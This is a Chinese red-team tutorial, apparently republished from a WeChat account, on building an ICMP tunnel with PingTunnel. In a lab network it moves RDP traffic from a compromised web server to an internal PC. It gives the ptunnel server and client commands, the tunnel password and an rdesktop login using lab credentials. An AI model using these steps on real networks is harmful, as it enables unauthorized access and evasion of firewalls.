前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >利用ICMP隧道加密隐藏通信Shell - 渗透红队笔记

利用ICMP隧道加密隐藏通信Shell - 渗透红队笔记

作者头像
渗透攻击红队
发布2020-11-25 10:38:30
1.5K0
发布2020-11-25 10:38:30
举报
文章被收录于专栏:漏洞知识库漏洞知识库

ICMP隧道

ICMP隧道是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定要开放端口,而在ICMP协议下就不需要。最常见的ICMP消息为Ping命令的回复,攻击者可以利用命令得到比回复更多的ICMP请求。在通常情况下,每个Ping命令都有相对应的回复与请求。

在一些条件下,如果攻击者使用各类隧道技术(HTTP,DNS,常规正反端口转发等)操作都失败了,常常会通过ping命令访问远程计算机,尝试进行ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(通常防火墙不会屏蔽ping数据包),实现不受限制的网络访问。

常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。

上篇文章我讲了Icmpsh反弹shell的使用过程:利用ICMP(icmpsh)协议反弹Shell - 渗透红队笔记

这篇文章我们来了解一下Icmp的一些特殊情况反弹shell技术。

ICMP隧道反弹Shell

PingTunnel


PingTunnel 也是一款常用的ICMP隧道工具,可以跨平台使用。为了避免隧道被滥用,它可以为隧道设置一个密码。

下载地址:

代码语言:javascript
复制
http://freshmeat.sourceforge.net/projects/ptunnel/

有这么一个场景:

如上图所示:我们通过渗透拿到了网络边界Web服务器(192.168.217.135),发现他内网有一台PC(192.168.217.132)并且开放了3389远程桌面,我们有密码(user:saul,pass:saul),但是通过跳板(192.168.217.135)的RDP连接不了内网PC的机子(做了限制),最后我们发现我们的跳板可以和内网PC能够Ping通,那么我们就可以通过ICMP协议隧道来进行远程桌面登陆。


一:首先需要建立ICMP隧道的两台机器(Hacker、跳板)上安装PingTunnel工具,然后配置编译。

代码语言:javascript
复制
make && make install

如果遇到以上情况:‘缺少 pcap.h’,那么需要安装libpcap(数据包捕获函数库)。

代码语言:javascript
复制
wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
tar zxvf libpcap-1.9.0.tar.gz
cd libpcap-1.9.0
./configure

如果中途出现 ‘yacc’包错误那么安装byacc包就可以了:

代码语言:javascript
复制
sudo apt-get install -y byacc

之后重新运行:

代码语言:javascript
复制
./configure
make
sudo make install

之后输入命令:

代码语言:javascript
复制
man pcap

出现以上就说明环境安装好了!最后再编译PingTunnel工具:

代码语言:javascript
复制
make && make install

二:在Web服务器跳板(192.168.217.135)中输入命令,运行PingTunnel工具:

代码语言:javascript
复制
sudo ptunnel -x saul[密码]

三:在Hacker攻击者(192.168.217.129)中输入以下命令:

代码语言:javascript
复制
ptunnel -p 192.168.217.135(跳板ip) -lp 1080 -da 192.168.217.132(内网PC) -dp 3389 -x saul
代码语言:javascript
复制
-x:指定ICMP隧道连接的密码
-lp:指定要监听的本地TCP端口
-da:指定要转发的目标机器的IP地址
-dp:指定要转发目标机器的TCP端口
-p:指定ICMP隧道另一段的机器IP地址

上面的命令的意思就是:在访问攻击者的机器Hacker(192.168.217.129)的1080端口时,会吧内网PC(192.168.217.132)的3389端口数据封装在ICMP隧道里,以Web服务器(192.168.217.135)为ICMP隧道跳板进行传输。 最后,在本地访问Hacker(192.168.217.129)的1080端口,可以发现已经可以和内网PC(192.168.217.132)的3389进行连接了:

代码语言:javascript
复制
rdesktop -g 1440x900 -u saul -p saul 127.0.0.1:1080

参考文章:

http://www.saulgoodman.cn/RedTeaming-6.html

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-10-13,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透攻击红队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档